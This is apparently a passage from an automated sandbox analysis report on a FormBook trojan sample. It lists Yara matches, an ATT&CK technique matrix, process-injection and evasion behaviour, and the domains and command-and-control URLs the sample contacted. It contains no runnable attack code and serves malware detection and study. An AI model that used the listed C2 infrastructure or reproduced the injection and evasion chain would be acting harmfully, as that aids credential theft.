          Source: explorer.exe, 00000010.00000002.1042861311.00000000048E7000.00000004.00000001.sdmpBinary or memory string: Progmank
          Source: explorer.exe, 00000002.00000000.687502736.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000006.00000002.1032343786.0000000003000000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.1029188263.00000000013D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.704041361.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: WerFault.exe, 0000000A.00000003.731420901.000001EDC784C000.00000004.00000001.sdmpBinary or memory string: SetProgmanWindow
          Source: explorer.exe, 00000010.00000002.1047169993.000000000637F000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndQ
          Source: explorer.exe, 00000010.00000002.1026816481.0000000000DD7000.00000004.00000020.sdmpBinary or memory string: CProgman-71
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState VolumeInformation
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132561585936642615.txt VolumeInformation
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState VolumeInformation
          Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: SearchUI.exe, 00000016.00000003.853890231.000001B8E4627000.00000004.00000001.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\SUPERAntiSpyware\SUPERAntiSpyware.exe
          Source: SearchUI.exe, 00000016.00000003.853890231.000001B8E4627000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Malwarebytes Anti-Malware\mbam.exe
          Source: SearchUI.exe, 00000016.00000002.913336755.000001B8D1870000.00000004.00000001.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\Windows Defender\MSASCui.exe
          Source: SearchUI.exe, 00000016.00000003.853890231.000001B8E4627000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Avira\AntiVir Desktop\avcenter.exe
          Source: SearchUI.exe, 00000016.00000003.853890231.000001B8E4627000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Avira\Antivirus\avcenter.exe

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1027686906.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.721240186.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.721927497.0000000001090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.686008623.0000000003DFA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1025912109.0000000000140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.686170457.0000000003F66000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.722073173.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1027686906.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.721240186.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.721927497.0000000001090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.686008623.0000000003DFA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1025912109.0000000000140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.686170457.0000000003F66000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.722073173.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1Shared Modules1Valid Accounts1Valid Accounts1Masquerading1Input Capture11Query Registry1Remote ServicesInput Capture11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsAccess Token Manipulation1Valid Accounts1LSASS MemorySecurity Software Discovery241Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Process Injection812Access Token Manipulation1Security Account ManagerVirtualization/Sandbox Evasion5SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion5NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDisable or Modify Tools1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection812Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDeobfuscate/Decode Files or Information1DCSyncSystem Information Discovery112Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Obfuscated Files or Information3/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Software Packing1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 344595 Sample: SecuriteInfo.com.Trojan.Pac... Startdate: 26/01/2021 Architecture: WINDOWS Score: 100 41 www.infomgt.net 2->41 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Multi AV Scanner detection for submitted file 2->53 55 3 other signatures 2->55 11 SecuriteInfo.com.Trojan.Packed2.42783.14936.exe 15 4 2->11         started        15 SearchUI.exe 2->15         started        17 SearchUI.exe 2->17         started        signatures3 process4 file5 37 C:\Users\user\AppData\...\AddInProcess32.exe, PE32 11->37 dropped 39 SecuriteInfo.com.T...42783.14936.exe.log, ASCII 11->39 dropped 71 Writes to foreign memory regions 11->71 73 Allocates memory in foreign processes 11->73 75 Hides that the sample has been downloaded from the Internet (zone.identifier) 11->75 77 Injects a PE file into a foreign processes 11->77 19 AddInProcess32.exe 11->19         started        signatures6 process7 signatures8 57 Modifies the context of a thread in another process (thread injection) 19->57 59 Maps a DLL or memory area into another process 19->59 61 Sample uses process hollowing technique 19->61 63 2 other signatures 19->63 22 explorer.exe 19->22 injected process9 process10 24 mstsc.exe 22->24         started        27 WerFault.exe 17 9 22->27         started        signatures11 65 Modifies the context of a thread in another process (thread injection) 24->65 67 Maps a DLL or memory area into another process 24->67 69 Tries to detect virtualization through RDTSC time measurements 24->69 29 explorer.exe 1 186 24->29         started        33 cmd.exe 1 24->33         started        process12 dnsIp13 43 g2vies.com 34.102.136.180, 49775, 49777, 80 GOOGLEUS United States 29->43 45 www.thesunchronical.com 29->45 47 5 other IPs or domains 29->47 79 System process connects to network (likely due to code injection or exploit) 29->79 35 conhost.exe 33->35         started        signatures14 process15

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Trojan.Packed2.42783.14936.exe29%VirustotalBrowse
          SecuriteInfo.com.Trojan.Packed2.42783.14936.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.AddInProcess32.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.luohu666.comReferer:0%Avira URL Cloudsafe
          http://www.g2vies.com0%Avira URL Cloudsafe
          http://www.gvanmp.com0%Avira URL Cloudsafe
          http://www.listenmelody.comReferer:0%Avira URL Cloudsafe
          https://aefd.nelreports.net/api/report?cingr0%Avira URL Cloudsafe
          http://www.infomgt.net/bsl/www.renttoowngenius.com0%Avira URL Cloudsafe
          http://ns.adobe.c/g0%URL Reputationsafe
          http://ns.adobe.c/g0%URL Reputationsafe
          http://ns.adobe.c/g0%URL Reputationsafe
          http://www.edu4go.com/bsl/0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
          http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
          http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
          http://www.whatchicken.comReferer:0%Avira URL Cloudsafe
          http://www.theprintshop.ink0%Avira URL Cloudsafe
          http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
          http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
          http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
          http://www.estivalconsultancy.com/bsl/0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://ns.adb0%Avira URL Cloudsafe
          http://www.infomgt.netReferer:0%Avira URL Cloudsafe
          http://www.thesunchronical.com/bsl/0%Avira URL Cloudsafe
          http://www.edu4go.com/bsl/www.infomgt.net0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.jokerwirewheels.com0%Avira URL Cloudsafe
          http://ns.adobe.cobj0%URL Reputationsafe
          http://ns.adobe.cobj0%URL Reputationsafe
          http://ns.adobe.cobj0%URL Reputationsafe
          http://www.gvanmp.com/bsl/www.whatchicken.com0%Avira URL Cloudsafe
          http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
          http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
          http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
          http://www.whatchicken.com/bsl/www.estivalconsultancy.com0%Avira URL Cloudsafe
          http://www.gvanmp.com/bsl/0%Avira URL Cloudsafe
          http://www.theprintshop.ink/bsl/www.cbothwelltest2020081703.com0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.renttoowngenius.com/bsl/www.jokerwirewheels.com0%Avira URL Cloudsafe
          http://www.renttoowngenius.comReferer:0%Avira URL Cloudsafe
          http://www.thesunchronical.com0%Avira URL Cloudsafe
          http://www.edu4go.com/bsl/?mt=meRO04KZ+tRueejEQ1mKApUC+xiZQAGZPTeO6WstMPZoEBgumINoRWRpGBFK3WkMjtLu&2d=hxlpdRkxCvtTgBzP0%Avira URL Cloudsafe
          http://www.g2vies.comReferer:0%Avira URL Cloudsafe
          https://aefd.nelreports.net/api/report?cat=bingrms0%Avira URL Cloudsafe
          http://www.g2vies.com/bsl/?2d=hxlpdRkxCvtTgBzP&mt=B72SzM4OK6YheLE+tS6SAH+1fBRAvDBThfWED1RPUqC7thw4cowf+3ukjA/mpLG53kNi0%Avira URL Cloudsafe
          http://www.infomgt.net/bsl/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.thesunchronical.com/bsl/www.serenityhomedits.com0%Avira URL Cloudsafe
          http://www.cbothwelltest2020081703.com/bsl/0%Avira URL Cloudsafe
          http://www.renttoowngenius.com0%Avira URL Cloudsafe
          http://www.jokerwirewheels.com/bsl/0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.edu4go.com0%Avira URL Cloudsafe
          https://mths.be/fromcodepoint0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.thesunchronical.comReferer:0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.serenityhomedits.com0%Avira URL Cloudsafe
          http://www.estivalconsultancy.com0%Avira URL Cloudsafe
          https://aefd.nel0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.luohu666.com0%Avira URL Cloudsafe
          http://www.estivalconsultancy.com/bsl/www.furnacerepairtacoma.net0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.serenityhomedits.comReferer:0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          edu4go.com
          34.102.136.180
          truetrue
            unknown
            www.infomgt.net
            188.166.214.231
            truefalse
              unknown
              g2vies.com
              34.102.136.180
              truetrue
                unknown
                www.g2vies.com
                unknown
                unknowntrue
                  unknown
                  www.edu4go.com
                  unknown
                  unknowntrue
                    unknown
                    www.serenityhomedits.com
                    unknown
                    unknowntrue
                      unknown
                      www.thesunchronical.com
                      unknown
                      unknowntrue
                        unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.edu4go.com/bsl/?mt=meRO04KZ+tRueejEQ1mKApUC+xiZQAGZPTeO6WstMPZoEBgumINoRWRpGBFK3WkMjtLu&2d=hxlpdRkxCvtTgBzPtrue
                        • Avira URL Cloud: safe
                        unknown
                        http://www.g2vies.com/bsl/?2d=hxlpdRkxCvtTgBzP&mt=B72SzM4OK6YheLE+tS6SAH+1fBRAvDBThfWED1RPUqC7thw4cowf+3ukjA/mpLG53kNitrue
                        • Avira URL Cloud: safe
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.luohu666.comReferer:explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.g2vies.comexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.gvanmp.comexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.listenmelody.comReferer:explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp, explorer.exe, 00000010.00000002.1047288395.00000000063EC000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://aefd.nelreports.net/api/report?cingrSearchUI.exe, 00000016.00000002.910509404.000001B8D0EE3000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.fontbureau.com/designersexplorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpfalse
                          high
                          http://www.infomgt.net/bsl/www.renttoowngenius.comexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://ns.adobe.c/gSecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000003.682654205.00000000082B2000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000003.668183280.00000000082A1000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.edu4go.com/bsl/explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.sajatypeworks.comexplorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.founder.com.cn/cn/cTheexplorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://ocsp.pki.goog/gts1o1core0SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.683370070.00000000024CF000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.whatchicken.comReferer:explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.theprintshop.inkexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://crl.pki.goog/GTS1O1core.crl0SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.683370070.00000000024CF000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://substrate.office.com/api/v2.0/Users(SearchUI.exe, 00000016.00000002.911449678.000001B8D1204000.00000004.00000001.sdmpfalse
                            high
                            https://substrate.office.com/profile/v0/users/SearchUI.exe, 00000016.00000002.911449678.000001B8D1204000.00000004.00000001.sdmpfalse
                              high
                              http://www.estivalconsultancy.com/bsl/explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://ns.adbSecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000003.682654205.00000000082B2000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.infomgt.netReferer:explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.thesunchronical.com/bsl/explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.edu4go.com/bsl/www.infomgt.netexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.urwpp.deDPleaseexplorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.zhongyicts.com.cnexplorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.683345162.00000000024A1000.00000004.00000001.sdmpfalse
                                high
                                http://www.jokerwirewheels.comexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://ns.adobe.cobjSecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000003.682654205.00000000082B2000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000003.668183280.00000000082A1000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.gvanmp.com/bsl/www.whatchicken.comexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://pki.goog/gsr2/GTS1O1.crt0SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.683370070.00000000024CF000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.whatchicken.com/bsl/www.estivalconsultancy.comexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.gvanmp.com/bsl/explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.theprintshop.ink/bsl/www.cbothwelltest2020081703.comexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.carterandcone.comlexplorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://substrate.office.comSearchUI.exe, 00000016.00000002.918398229.000001B8D25E0000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.renttoowngenius.com/bsl/www.jokerwirewheels.comexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.renttoowngenius.comReferer:explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.thesunchronical.comexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.g2vies.comReferer:explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://aefd.nelreports.net/api/report?cat=bingrmsSearchUI.exe, 00000016.00000002.911665172.000001B8D128D000.00000004.00000001.sdmp, SearchUI.exe, 00000016.00000003.830851464.000001B8D12E5000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.infomgt.net/bsl/explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.fontbureau.com/designersGexplorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.fontbureau.com/designers/?explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.founder.com.cn/cn/bTheexplorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.thesunchronical.com/bsl/www.serenityhomedits.comexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.fontbureau.com/designers?explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.cbothwelltest2020081703.com/bsl/explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.renttoowngenius.comexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.jokerwirewheels.com/bsl/explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.tiro.comexplorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.edu4go.comexplorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
